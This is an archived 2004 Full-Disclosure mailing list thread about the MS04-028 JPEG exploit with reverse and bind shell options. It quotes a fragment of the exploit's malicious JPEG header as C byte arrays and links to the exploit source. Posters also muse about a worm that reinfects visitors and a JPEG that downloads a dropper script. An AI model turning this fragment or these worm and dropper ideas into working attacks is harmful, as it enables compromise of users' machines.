| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: toddtowles at brookshires.com (Todd Towles) Subject: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Isn't there a tool that will create the jpeg for it..and you can input the URL you want the JPEG to download. The JPEG will grab dropper script or whatever you want it too. No need to revisit. Am I correct in thinking this? -----Original Message----- From: full-disclosure-admin@...ts.netsys.com [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Castigliola, Angelo Sent: Monday, September 27, 2004 3:30 PM To: morning_wood; full-disclosure@...ts.netsys.com Subject: RE: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Eh, It would not be that hard to write up something that could revisit all of the computers that hit the web server to infect them with something after the initial jpg exploit was ran. It would truly be a one of a kind worm. Reason enough in itself to motivate someone to write it. As far as Media hype. I'm all for it. It keeps the IT job market strong. Angelo Castigliola III Operations Technical Analyst I UnumProvident IT Services 207.575.3820 -----Original Message----- From: full-disclosure-admin@...ts.netsys.com [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of morning_wood Sent: Saturday, September 25, 2004 2:06 PM To: full-disclosure@...ts.netsys.com Subject: Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... umm, no all this has thats different is correct headers for bind or remote shell option. and ability to set ports and return ip in the code, instead of needing to use your own shellcode ( or metasploits ) note: there is no new exploit code or vector ------------------- / snip /----------------- new. char header1[] = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- old. ------------------- / snip /----------------- char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- take your media hype and die kthnx, m.wood > the last step before the worm > > http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists